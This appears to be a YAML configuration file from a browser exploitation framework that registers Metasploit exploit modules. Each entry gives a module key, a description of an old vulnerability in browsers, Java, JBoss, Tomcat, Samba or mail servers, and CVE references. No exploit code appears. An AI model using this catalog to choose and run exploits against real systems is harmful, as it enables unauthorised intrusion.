msf_mozilla_navigatorjava:
enable: true
msf: true
msf_key: multi/browser/mozilla_navigatorjava
name: Mozilla Suite/Firefox Navigator Object Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a code execution vulnerability in the Mozilla\n\
\t\t\t\tSuite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit\n\
\t\t\t\trequires the Java plugin to be installed.\n\
\t\t\t"
authors:
- - CVE
- 2006-3677
- - OSVDB
- "27559"
- - BID
- "19192"
- - URL
- http://www.mozilla.org/security/announce/mfsa2006-45.html
- - URL
- http://browserfun.blogspot.com/2006/07/mobb-28-mozilla-navigator-object.html
path: extensions/metasploit/
class: Msf_module
msf_mozilla_compareto:
enable: true
msf: true
msf_key: multi/browser/mozilla_compareto
name: Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a code execution vulnerability in the Mozilla\n\
\t\t\t\tSuite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit\n\
\t\t\t\tmodule is a direct port of Aviv Raff's HTML PoC.\n\
\t\t\t"
authors:
- - CVE
- 2005-2265
- - OSVDB
- "17968"
- - BID
- "14242"
- - URL
- http://www.mozilla.org/security/announce/mfsa2005-50.html
path: extensions/metasploit/
class: Msf_module
msf_java_rmi_connection_impl:
enable: true
msf: true
msf_key: multi/browser/java_rmi_connection_impl
name: Java RMIConnectionImpl Deserialization Privilege Escalation Exploit
category: Metasploit
description: "\n\
\t\t\tThis module exploits a vulnerability in the Java Runtime Environment\n\
\t\t\tthat allows a MarshalledObject containing a custom classloader to be\n\
\t\t\tdeserialized under a privileged context. The vulnerability affects\n\
\t\t\tversion 6 prior to update 19 and version 5 prior to update 23.\n\
\t\t\t"
authors:
- - CVE
- 2010-0094
- - OSVDB
- "63484"
- - URL
- http://slightlyrandombrokenthoughts.blogspot.com/2010/04/java-rmiconnectionimpl-deserialization.html
path: extensions/metasploit/
class: Msf_module
msf_java_getsoundbank_bof:
enable: true
msf: true
msf_key: multi/browser/java_getsoundbank_bof
name: Sun Java JRE getSoundbank file:// URI Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a flaw in the getSoundbank function in the Sun JVM.\n\n\
\t\t\t\tThe payload is serialized and passed to the applet via PARAM tags. It must be\n\
\t\t\t\ta native payload.\n\n\
\t\t\t\tThe affected Java versions are JDK and JRE 6 Update 16 and earlier,\n\
\t\t\t\tJDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and\n\
\t\t\t\tearlier, and SDK and JRE 1.3.1_26 and earlier.\n\n\
\t\t\t\tNOTE: Although all of the above versions are reportedly vulnerable, only\n\
\t\t\t\t1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.\n\
\t\t\t"
authors:
- - CVE
- 2009-3867
- - OSVDB
- "59711"
- - BID
- "36881"
- - URL
- http://zerodayinitiative.com/advisories/ZDI-09-076/
path: extensions/metasploit/
class: Msf_module
msf_firefox_queryinterface:
enable: true
msf: true
msf_key: multi/browser/firefox_queryinterface
name: Firefox location.QueryInterface() Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a code execution vulnerability in the Mozilla\n\
\t\t\t\tFirefox browser. To reliably exploit this vulnerability, we need to fill\n\
\t\t\t\talmost a gigabyte of memory with our nop sled and payload. This module has\n\
\t\t\t\tbeen tested on OS X 10.3 with the stock Firefox 1.5.0 package.\n\
\t\t\t"
authors:
- - CVE
- 2006-0295
- - OSVDB
- "22893"
- - BID
- "16476"
- - URL
- http://www.mozilla.org/security/announce/mfsa2006-04.html
path: extensions/metasploit/
class: Msf_module
msf_itms_overflow:
enable: true
msf: true
msf_key: multi/browser/itms_overflow
name: Apple OS X iTunes 8.1.1 ITMS Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in iTunes\n\
\t\t\t\titms:// URL parsing. It is accessible from the browser and\n\
\t\t\t\tin Safari, itms:// URLs will be opened in iTunes automatically.\n\
\t\t\t\tBecause iTunes is multithreaded, only vfork-based payloads should\n\
\t\t\t\tbe used.\n\
\t\t\t"
authors:
- - CVE
- 2009-0950
- - OSVDB
- "54833"
- - URL
- http://support.apple.com/kb/HT3592
- - URL
- http://redpig.dataspill.org/2009/05/drive-by-attack-for-itunes-811.html
path: extensions/metasploit/
class: Msf_module
msf_wuftpd_site_exec_format:
enable: true
msf: true
msf_key: multi/ftp/wuftpd_site_exec_format
name: wu-ftpd SITE EXEC/INDEX Format String Vulnerability
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a format string vulnerability in versions of the\n\
\t\t\t\tWashington University FTP server older than 2.6.1. By executing\n\
\t\t\t\tspecially crafted SITE EXEC or SITE INDEX commands containing format\n\
\t\t\t\tspecifiers, an attacker can corrupt memory and execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2000-0573
- - OSVDB
- "11805"
- - BID
- "1387"
path: extensions/metasploit/
class: Msf_module
msf_svnserve_date:
enable: true
msf: true
msf_key: multi/svn/svnserve_date
name: Subversion Date Svnserve
category: Metasploit
description: "\n\
\t\t\t\t\tThis is an exploit for the Subversion date parsing overflow. This\n\
\t\t\t\texploit is for the svnserve daemon (svn:// protocol) and will not work\n\
\t\t\t\tfor Subversion over webdav (http[s]://). This exploit should never\n\
\t\t\t\tcrash the daemon, and should be safe to do multi-hits.\n\n\
\t\t\t\t**WARNING** This exploit seems to (not very often, I've only seen\n\
\t\t\t\tit during testing) corrupt the subversion database, so be careful!\n\
\t\t\t"
authors:
- - CVE
- 2004-0397
- - OSVDB
- "6301"
- - BID
- "10386"
- - URL
- http://lists.netsys.com/pipermail/full-disclosure/2004-May/021737.html
- - MIL
- "68"
path: extensions/metasploit/
class: Msf_module
msf_spree_searchlogic_exec:
enable: true
msf: true
msf_key: multi/http/spree_searchlogic_exec
name: Spreecommerce < 0.50.0 Arbitrary Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an arbitrary command execution vulnerability in the\n\
\t\t\t\t\tSpreecommerce API searchlogic. Unvalidated input is called via the \n\
\t\t\t\t\tRuby send method allowing command execution.\n\
\t\t\t"
authors:
- - OSVDB
- "71900"
- - URL
- http://www.spreecommerce.com/blog/2011/04/19/security-fixes/
path: extensions/metasploit/
class: Msf_module
msf_jboss_maindeployer:
enable: true
msf: true
msf_key: multi/http/jboss_maindeployer
name: JBoss JMX Console Deployer Upload and Execute
category: Metasploit
description: "\n\
\t\t\t\t\tThis module can be used to execute a payload on JBoss servers that have\n\
\t\t\t\tan exposed \"jmx-console\" application. The payload is put on the server by\n\
\t\t\t\tusing the jboss.system:MainDeployer functionality. To accomplish this, a\n\
\t\t\t\ttemporary HTTP server is created to serve a WAR archive containing our\n\
\t\t\t\tpayload. This method will only work if the target server allows outbound\n\
\t\t\t\tconnections to us.\n\
\t\t\t"
authors:
- - CVE
- 2007-1036
- - CVE
- 2010-0738
- - OSVDB
- "33744"
- - URL
- http://www.redteam-pentesting.de/publications/jboss
- - URL
- https://bugzilla.redhat.com/show_bug.cgi?id=574105
path: extensions/metasploit/
class: Msf_module
msf_jboss_bshdeployer:
enable: true
msf: true
msf_key: multi/http/jboss_bshdeployer
name: JBoss JMX Console Beanshell Deployer WAR upload and deployment
category: Metasploit
description: "\n\
\t\t\t\t\tThis module can be used to install a WAR file payload on JBoss servers that have\n\
\t\t\t\tan exposed \"jmx-console\" application. The payload is put on the server by\n\
\t\t\t\tusing the jboss.system:BSHDeployer's createScriptDeployment() method.\n\
\t\t\t"
authors:
- - CVE
- 2010-0738
- - URL
- http://www.redteam-pentesting.de/publications/jboss
- - URL
- https://bugzilla.redhat.com/show_bug.cgi?id=574105
path: extensions/metasploit/
class: Msf_module
msf_sun_jsws_dav_options:
enable: true
msf: true
msf_key: multi/http/sun_jsws_dav_options
name: Sun Java System Web Server WebDAV OPTIONS Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Sun Java Web Server prior to\n\
\t\t\t\tversion 7 Update 8. By sending an \"OPTIONS\" request with an overly long\n\
\t\t\t\tpath, attackers can execute arbitrary code. In order to reach the vulnerable\n\
\t\t\t\tcode, the attacker must also specify the path to a directory with WebDAV\n\
\t\t\t\tenabled.\n\n\
\t\t\t\tThis exploit was tested and confirmed to work on Windows XP SP3 without DEP.\n\
\t\t\t\tVersions for other platforms are vulnerable as well.\n\n\
\t\t\t\tThe vulnerability was originally discovered and disclosed by Evgeny Legerov of\n\
\t\t\t\tIntevydis.\n\
\t\t\t"
authors:
- - CVE
- 2010-0361
- - OSVDB
- "61851"
- - URL
- http://intevydis.blogspot.com/2010/01/sun-java-system-web-server-70u7-webdav.html
- - URL
- http://sunsolve.sun.com/search/document.do?assetkey=1-66-275850-1
path: extensions/metasploit/
class: Msf_module
msf_jboss_deploymentfilerepository:
enable: true
msf: true
msf_key: multi/http/jboss_deploymentfilerepository
name: JBoss Java Class DeploymentFileRepository WAR deployment
category: Metasploit
description: "\n\
\t\t\t\t\tThis module uses the DeploymentFileRepository class in\n\
\t\t\t\tJBoss Application Server (jbossas) to deploy a JSP file\n\
\t\t\t\tin a minimal WAR context.\n\
\t\t\t"
authors:
- - CVE
- 2010-0738
- - URL
- http://www.redteam-pentesting.de/publications/jboss
- - URL
- https://bugzilla.redhat.com/show_bug.cgi?id=574105
path: extensions/metasploit/
class: Msf_module
msf_freenas_exec_raw:
enable: true
msf: true
msf_key: multi/http/freenas_exec_raw
name: FreeNAS exec_raw.php Arbitrary Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an arbitrary command execution flaw\n\
\t\t\t\tin FreeNAS 0.7.2 < rev.5543. When passing a specially formatted URL\n\
\t\t\t\tto the exec_raw.php page, an attacker may be able to execute arbitrary\n\
\t\t\t\tcommands.\n\n\
\t\t\t\tNOTE: This module works best with php/meterpreter payloads.\n\
\t\t\t"
authors:
- - URL
- http://sourceforge.net/projects/freenas/files/stable/0.7.2/NOTES%200.7.2.5543.txt/download
path: extensions/metasploit/
class: Msf_module
msf_axis2_deployer:
enable: true
msf: true
msf_key: multi/http/axis2_deployer
name: Axis2 / SAP BusinessObjects Authenticated Code Execution (via SOAP)
category: Metasploit
description: "\n\
\t\t\t\t\tThis module logs in to an Axis2 Web Admin Module instance using a specific user/pass\n\
\t\t\t\tand uploads and executes commands via deploying a malicious web service by using SOAP.\n\
\t\t\t"
authors:
- - URL
- http://www.rapid7.com/security-center/advisories/R7-0037.jsp
- - URL
- http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf
- - CVE
- 2010-0219
path: extensions/metasploit/
class: Msf_module
msf_axis2_deployer_rest:
enable: true
msf: true
msf_key: multi/http/axis2_deployer_rest
name: Axis2 Authenticated Code Execution (via REST)
category: Metasploit
description: "\n\
\t\t\t\t\tThis module logs in to an Axis2 Web Admin Module instance using a specific user/pass\n\
\t\t\t\tand uploads and executes commands via deploying a malicious web service by using REST.\n\
\t\t\t"
authors:
- - URL
- http://www.rapid7.com/security-center/advisories/R7-0037.jsp
- - URL
- http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf
- - CVE
- 2010-0219
path: extensions/metasploit/
class: Msf_module
msf_tomcat_mgr_deploy:
enable: true
msf: true
msf_key: multi/http/tomcat_mgr_deploy
name: Apache Tomcat Manager Application Deployer Authenticated Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module can be used to execute a payload on Apache Tomcat servers that\n\
\t\t\t\thave an exposed \"manager\" application. The payload is uploaded as a WAR archive\n\
\t\t\t\tcontaining a jsp application using a PUT request.\n\n\
\t\t\t\tThe manager application can also be abused using /manager/html/upload, but that\n\
\t\t\t\tmethod is not implemented in this module.\n\
\t\t\t"
authors:
- - CVE
- 2009-3843
- - OSVDB
- "60317"
- - CVE
- 2009-4189
- - OSVDB
- "60670"
- - CVE
- 2009-4188
- - BID
- "38084"
- - CVE
- 2010-0557
- - URL
- http://www-01.ibm.com/support/docview.wss?uid=swg21419179
- - CVE
- 2010-4094
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-10-214/
- - CVE
- 2009-3548
- - OSVDB
- "60176"
- - BID
- "36954"
- - URL
- http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html
path: extensions/metasploit/
class: Msf_module
msf_describe:
enable: true
msf: true
msf_key: multi/realserver/describe
name: RealServer Describe Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a buffer overflow in RealServer 7/8/9\n\
\t\t\t\tand was based on Johnny Cyberpunk's THCrealbad exploit. This\n\
\t\t\t\tcode should reliably exploit Linux, BSD, and Windows-based\n\
\t\t\t\tservers.\n\
\t\t\t"
authors:
- - CVE
- 2002-1643
- - OSVDB
- "4468"
- - URL
- http://lists.immunitysec.com/pipermail/dailydave/2003-August/000030.html
path: extensions/metasploit/
class: Msf_module
msf_ntp_overflow:
enable: true
msf: true
msf_key: multi/ntp/ntp_overflow
name: NTP daemon readvar Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack based buffer overflow in the\n\
\t\t\t\tntpd and xntpd service. By sending an overly long 'readvar'\n\
\t\t\t\trequest it is possible to execute code remotely. As the stack\n\
\t\t\t\tis corrupted, this module uses the Egghunter technique.\n\
\t\t\t"
authors:
- - CVE
- 2001-0414
- - OSVDB
- "805"
- - BID
- "2540"
- - US-CERT-VU
- "970472"
path: extensions/metasploit/
class: Msf_module
msf_peazip_command_injection:
enable: true
msf: true
msf_key: multi/fileformat/peazip_command_injection
name: PeaZip <= 2.6.1 Zip Processing Command Injection
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a command injection vulnerability in PeaZip. All\n\
\t\t\t\tversions prior to 2.6.2 are suspected vulnerable. Testing was conducted with\n\
\t\t\t\tversion 2.6.1 on Windows.\n\n\
\t\t\t\tIn order for the command to be executed, an attacker must convince someone to\n\
\t\t\t\topen a specially crafted zip file with PeaZip, and access the specially crafted file by\n\
\t\t\t\tdouble-clicking it. By doing so, an attacker can execute arbitrary commands\n\
\t\t\t\tas the victim user.\n\
\t\t\t"
authors:
- - CVE
- 2009-2261
- - OSVDB
- "54966"
- - URL
- http://peazip.sourceforge.net/
- - URL
- http://www.exploit-db.com/exploits/8881
path: extensions/metasploit/
class: Msf_module
msf_adobe_u3d_meshcont:
enable: true
msf: true
msf_key: multi/fileformat/adobe_u3d_meshcont
name: Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an array overflow in Adobe Reader and Adobe Acrobat.\n\
\t\t\t\tAffected versions include < 7.1.4, < 8.1.7, and < 9.2. By creating a\n\
\t\t\t\tspecially crafted pdf that contains malformed U3D data, an attacker may\n\
\t\t\t\tbe able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2009-2990
- - OSVDB
- "58920"
- - BID
- "36665"
- - URL
- http://sites.google.com/site/felipeandresmanzano/
- - URL
- http://www.adobe.com/support/security/bulletins/apsb09-15.html
path: extensions/metasploit/
class: Msf_module
msf_maple_maplet:
enable: true
msf: true
msf_key: multi/fileformat/maple_maplet
name: Maple Maplet File Creation and Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module harnesses Maple's ability to create files and execute commands\n\
\t\t\t\tautomatically when opening a Maplet. All versions up to 13 are suspected\n\
\t\t\t\tvulnerable. Testing was conducted with version 13 on Windows. Standard security\n\
\t\t\t\tsettings prevent code from running in a normal maple worksheet without user\n\
\t\t\t\tinteraction, but those settings do not prevent code in a Maplet from running.\n\n\
\t\t\t\tIn order for the payload to be executed, an attacker must convince someone to\n\
\t\t\t\topen a specially modified .maplet file with Maple. By doing so, an attacker can\n\
\t\t\t\texecute arbitrary code as the victim user.\n\
\t\t\t"
authors:
- - OSVDB
- "64541"
- - URL
- http://www.maplesoft.com/products/maple/
path: extensions/metasploit/
class: Msf_module
msf_handler:
enable: true
msf: true
msf_key: multi/handler
name: Generic Payload Handler
category: Metasploit
description: "\n\
\t\t\t\tThis module is a stub that provides all of the\n\
\t\t\t\tfeatures of the Metasploit payload system to exploits\n\
\t\t\t\tthat have been launched outside of the framework.\n\
\t\t\t"
authors: []
path: extensions/metasploit/
class: Msf_module
msf_nttrans:
enable: true
msf: true
msf_key: multi/samba/nttrans
name: Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module attempts to exploit a buffer overflow vulnerability present in\n\
\t\t\t\tversions 2.2.2 through 2.2.6 of Samba.\n\n\
\t\t\t\tThe Samba developers report this as:\n\
\t\t\t\t\"Bug in the length checking for encrypted password change requests from clients.\"\n\n\
\t\t\t\tThe bug was discovered and reported by the Debian Samba Maintainers.\n\
\t\t\t"
authors:
- - CVE
- 2003-0085
- - OSVDB
- "6323"
- - BID
- "7106"
- - URL
- http://www.samba.org/samba/history/samba-2.2.7a.html
path: extensions/metasploit/
class: Msf_module
msf_usermap_script:
enable: true
msf: true
msf_key: multi/samba/usermap_script
name: Samba "username map script" Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a command execution vulnerability in Samba\n\
\t\t\t\tversions 3.0.20 through 3.0.25rc3 when using the non-default\n\
\t\t\t\t\"username map script\" configuration option. By specifying a username\n\
\t\t\t\tcontaining shell meta characters, attackers can execute arbitrary\n\
\t\t\t\tcommands.\n\n\
\t\t\t\tNo authentication is needed to exploit this vulnerability since\n\
\t\t\t\tthis option is used to map usernames prior to authentication!\n\
\t\t\t"
authors:
- - CVE
- 2007-2447
- - OSVDB
- "34700"
- - BID
- "23972"
- - URL
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534
- - URL
- http://samba.org/samba/security/CVE-2007-2447.html
path: extensions/metasploit/
class: Msf_module
msf_xtacacsd_report:
enable: true
msf: true
msf_key: freebsd/tacacs/xtacacsd_report
name: XTACACSD <= 4.1.2 report() Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in XTACACSD <= 4.1.2. By\n\
\t\t\t\tsending a specially crafted XTACACS packet with an overly long\n\
\t\t\t\tusername, an attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-7232
- - OSVDB
- "58140"
- - URL
- http://aluigi.altervista.org/adv/xtacacsdz-adv.txt
path: extensions/metasploit/
class: Msf_module
msf_cleanup_exec:
enable: true
msf: true
msf_key: hpux/lpd/cleanup_exec
name: HP-UX LPD Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis exploit abuses an unpublished vulnerability in the\n\
\t\t\t\tHP-UX LPD service. This flaw allows an unauthenticated\n\
\t\t\t\tattacker to execute arbitrary commands with the privileges\n\
\t\t\t\tof the root user. The LPD service is only exploitable when\n\
\t\t\t\tthe address of the attacking system can be resolved by the\n\
\t\t\t\ttarget. This vulnerability was silently patched with the\n\
\t\t\t\tbuffer overflow flaws addressed in HP Security Bulletin\n\
\t\t\t\tHPSBUX0208-213.\n\
\t\t\t"
authors:
- - CVE
- 2002-1473
- - OSVDB
- "9638"
- - URL
- http://archives.neohapsis.com/archives/hp/2002-q3/0064.html
path: extensions/metasploit/
class: Msf_module
msf_ypops_overflow1:
enable: true
msf: true
msf_key: windows/smtp/ypops_overflow1
name: YPOPS 0.6 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the YPOPS POP3\n\
\t\t\t\tservice.\n\n\
\t\t\t\tThis is a classic stack buffer overflow for YPOPS version 0.6.\n\
\t\t\t\tVersions 0.5, 0.4.5.1 and 0.4.5 are possibly affected. EIP points to\n\
\t\t\t\ta jmp ebx opcode in ws_32.dll.\n\
\t\t\t"
authors:
- - CVE
- 2004-1558
- - OSVDB
- "10367"
- - BID
- "11256"
- - URL
- http://www.securiteam.com/windowsntfocus/5GP0M2KE0S.html
path: extensions/metasploit/
class: Msf_module
msf_wmailserver:
enable: true
msf: true
msf_key: windows/smtp/wmailserver
name: SoftiaCom WMailserver 1.0 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in SoftiaCom WMailserver 1.0\n\
\t\t\t\t(SMTP) via a SEH frame overwrite.\n\
\t\t\t"
authors:
- - CVE
- 2005-2287
- - OSVDB
- "17883"
- - BID
- "14213"
path: extensions/metasploit/
class: Msf_module
msf_ms03_046_exchange2000_xexch50:
enable: true
msf: true
msf_key: windows/smtp/ms03_046_exchange2000_xexch50
name: MS03-046 Exchange 2000 XEXCH50 Heap Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis is an exploit for the Exchange 2000 heap overflow. Due\n\
\t\t\t\tto the nature of the vulnerability, this exploit is not very\n\
\t\t\t\treliable. This module has been tested against Exchange 2000\n\
\t\t\t\tSP0 and SP3 running a Windows 2000 system patched to SP4. It\n\
\t\t\t\tnormally takes between one and 100 connection attempts to\n\
\t\t\t\tsuccessfully obtain a shell. This exploit is *very* unreliable.\n\
\t\t\t"
authors:
- - CVE
- 2003-0714
- - BID
- "8838"
- - OSVDB
- "2674"
- - MSB
- MS03-046
- - URL
- http://www.milw0rm.com/exploits/113
path: extensions/metasploit/
class: Msf_module
msf_mercury_cram_md5:
enable: true
msf: true
msf_key: windows/smtp/mercury_cram_md5
name: Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Mercury Mail Transport System 4.51.\n\
\t\t\t\tBy sending a specially crafted argument to the AUTH CRAM-MD5 command, an attacker\n\
\t\t\t\tmay be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-4440
- - OSVDB
- "39669"
- - BID
- "25357"
path: extensions/metasploit/
class: Msf_module
msf_mailcarrier_smtp_ehlo:
enable: true
msf: true
msf_key: windows/smtp/mailcarrier_smtp_ehlo
name: TABS MailCarrier v2.51 SMTP EHLO Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits the MailCarrier v2.51 suite SMTP service.\n\
\t\t\t\tThe stack is overwritten when sending an overly long EHLO command.\n\
\t\t\t"
authors:
- - CVE
- 2004-1638
- - OSVDB
- "11174"
- - BID
- "11535"
- - URL
- http://milw0rm.com/exploits/598
path: extensions/metasploit/
class: Msf_module
msf_fb_isc_attach_database:
enable: true
msf: true
msf_key: windows/misc/fb_isc_attach_database
name: Firebird Relational Database isc_attach_database() Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\n\
\t\t\t\tby sending a specially crafted create request.\n\
\t\t\t"
authors:
- - CVE
- 2007-5243
- - OSVDB
- "38607"
- - BID
- "25917"
- - URL
- http://www.risesecurity.org/advisories/RISE-2007002.txt
path: extensions/metasploit/
class: Msf_module
msf_splayer_content_type:
enable: true
msf: true
msf_key: windows/misc/splayer_content_type
name: SPlayer 3.7 Content-Type Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in SPlayer v3.7 or prior. When SPlayer\n\
\t\t\t\trequests the URL of a media file (video or audio), it is possible to gain arbitrary\n\
\t\t\t\tremote code execution due to a buffer overflow caused by excessively long data\n\
\t\t\t\tin the 'Content-Type' parameter.\n\
\t\t\t"
authors:
- - OSVDB
- "72181"
- - URL
- http://www.exploit-db.com/exploits/17243/
path: extensions/metasploit/
class: Msf_module
msf_bomberclone_overflow:
enable: true
msf: true
msf_key: windows/misc/bomberclone_overflow
name: Bomberclone 0.11.6 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Bomberclone 0.11.6 for Windows.\n\
\t\t\t\tThe return address is overwritten with the address of lstrcpyA,\n\
\t\t\t\tthe second and third values are the destination buffer, and\n\
\t\t\t\tthe fourth value is the source address of our buffer on the stack.\n\
\t\t\t\tThis exploit works like a return-into-libc.\n\n\
\t\t\t\tATTENTION\n\
\t\t\t\tThe shellcode is executed ONLY when someone tries to close Bomberclone.\n\
\t\t\t"
authors:
- - CVE
- 2006-0460
- - OSVDB
- "23263"
- - BID
- "16697"
- - URL
- http://www.frsirt.com/english/advisories/2006/0643
path: extensions/metasploit/
class: Msf_module
msf_mirc_privmsg_server:
enable: true
msf: true
msf_key: windows/misc/mirc_privmsg_server
name: mIRC <= 6.34 PRIVMSG Handling Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the mIRC IRC Client v6.34 and earlier.\n\
\t\t\t\tBy enticing a mIRC user to connect to this server module, an excessively long PRIVMSG\n\
\t\t\t\tcommand can be sent, overwriting the stack. Due to size restrictions, ordinal payloads\n\
\t\t\t\tmay be necessary. This module is based on the code by SkD.\n\
\t\t\t"
authors:
- - CVE
- 2008-4449
- - OSVDB
- "48752"
- - BID
- "31552"
- - URL
- http://www.milw0rm.com/exploits/6666
path: extensions/metasploit/
class: Msf_module
msf_ibm_tsm_rca_dicugetidentify:
enable: true
msf: true
msf_key: windows/misc/ibm_tsm_rca_dicugetidentify
name: IBM Tivoli Storage Manager Express RCA Service Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express Remote\n\
\t\t\t\tClient Agent service. By sending a \"dicuGetIdentify\" request packet containing a long\n\
\t\t\t\tNodeName parameter, an attacker can execute arbitrary code.\n\n\
\t\t\t\tNOTE: this exploit first connects to the CAD service to start the RCA service and obtain\n\
\t\t\t\tthe port number on which it runs. This service does not restart.\n\
\t\t\t"
authors:
- - CVE
- 2008-4828
- - OSVDB
- "54232"
- - BID
- "34803"
path: extensions/metasploit/
class: Msf_module
msf_nettransport:
enable: true
msf: true
msf_key: windows/misc/nettransport
name: NetTransport Download Manager 2.90.510 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis exploits a stack buffer overflow in NetTransport Download Manager,\n\
\t\t\t\tpart of the NetXfer suite. This module was tested\n\
\t\t\t\tsuccessfully against version 2.90.510.\n\
\t\t\t"
authors:
- - OSVDB
- "61435"
- - URL
- http://www.exploit-db.com/exploits/10911
path: extensions/metasploit/
class: Msf_module
msf_poppeeper_date:
enable: true
msf: true
msf_key: windows/misc/poppeeper_date
name: POP Peeper v3.4 DATE Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in POP Peeper v3.4.\n\
\t\t\t\tWhen a specially crafted DATE string is sent to a client,\n\
\t\t\t\tan attacker may be able to execute arbitrary code. This\n\
\t\t\t\tmodule is based off of krakowlabs code.\n\
\t\t\t"
authors:
- - CVE
- 2009-1029
- - OSVDB
- "53560"
- - BID
- "34093"
- - URL
- http://www.krakowlabs.com/res/adv/KL0209ADV-poppeeper_date-bof.txt
path: extensions/metasploit/
class: Msf_module
msf_bigant_server_250:
enable: true
msf: true
msf_key: windows/misc/bigant_server_250
name: BigAnt Server 2.50 SP1 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis exploits a stack buffer overflow in the BigAnt Messaging Service,\n\
\t\t\t\tpart of the BigAnt Server product suite. This module was tested\n\
\t\t\t\tsuccessfully against version 2.50 SP1.\n\
\t\t\t"
authors:
- - CVE
- 2008-1914
- - OSVDB
- "44454"
- - URL
- http://www.exploit-db.com/exploits/9673
- - URL
- http://www.exploit-db.com/exploits/9690
path: extensions/metasploit/
class: Msf_module
msf_ib_isc_attach_database:
enable: true
msf: true
msf_key: windows/misc/ib_isc_attach_database
name: Borland InterBase isc_attach_database() Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\n\
\t\t\t\tby sending a specially crafted attach request.\n\
\t\t\t"
authors:
- - CVE
- 2007-5243
- - OSVDB
- "38607"
- - BID
- "25917"
- - URL
- http://www.risesecurity.org/advisories/RISE-2007002.txt
path: extensions/metasploit/
class: Msf_module
msf_hp_ovtrace:
enable: true
msf: true
msf_key: windows/misc/hp_ovtrace
name: HP OpenView Operations OVTrace Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Operations version A.07.50.\n\
\t\t\t\tBy sending a specially crafted packet, a remote attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-3872
- - OSVDB
- "39527"
- - BID
- "25255"
path: extensions/metasploit/
class: Msf_module
msf_ib_svc_attach:
enable: true
msf: true
msf_key: windows/misc/ib_svc_attach
name: Borland InterBase SVC_attach() Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\n\
\t\t\t\tby sending a specially crafted service attach request.\n\
\t\t\t"
authors:
- - CVE
- 2007-5243
- - OSVDB
- "38605"
- - BID
- "25917"
- - URL
- http://www.risesecurity.org/advisories/RISE-2007002.txt
path: extensions/metasploit/
class: Msf_module
msf_mercury_phonebook:
enable: true
msf: true
msf_key: windows/misc/mercury_phonebook
name: Mercury/32 <= v4.01b PH Server Module Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in\n\
\t\t\t\tMercury/32 <= v4.01b PH Server Module. This issue is\n\
\t\t\t\tdue to a failure of the application to properly bounds check\n\
\t\t\t\tuser-supplied data prior to copying it to a fixed size memory buffer.\n\
\t\t\t"
authors:
- - CVE
- 2005-4411
- - OSVDB
- "22103"
- - BID
- "16396"
path: extensions/metasploit/
class: Msf_module
msf_bigant_server_usv:
enable: true
msf: true
msf_key: windows/misc/bigant_server_usv
name: BigAnt Server 2.52 USV Buffer Overflow
category: Metasploit
description: "\n\
